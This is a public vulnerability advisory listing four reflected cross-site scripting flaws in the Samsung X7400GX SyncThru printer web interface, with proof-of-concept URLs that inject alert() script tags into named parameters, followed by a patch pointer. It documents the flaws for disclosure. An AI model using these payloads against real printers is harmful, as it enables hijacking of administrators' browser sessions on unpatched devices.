SAMSUNG X7400GX Sync Thru Web Cross Site Scripting

2019.02.11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

<!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters: ruiFw_id, ruiFw_pid, ruiFw_title. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.application/information/networkinformationView.sws" in the tabName 2. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple parameters: contextpath and basedURL. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top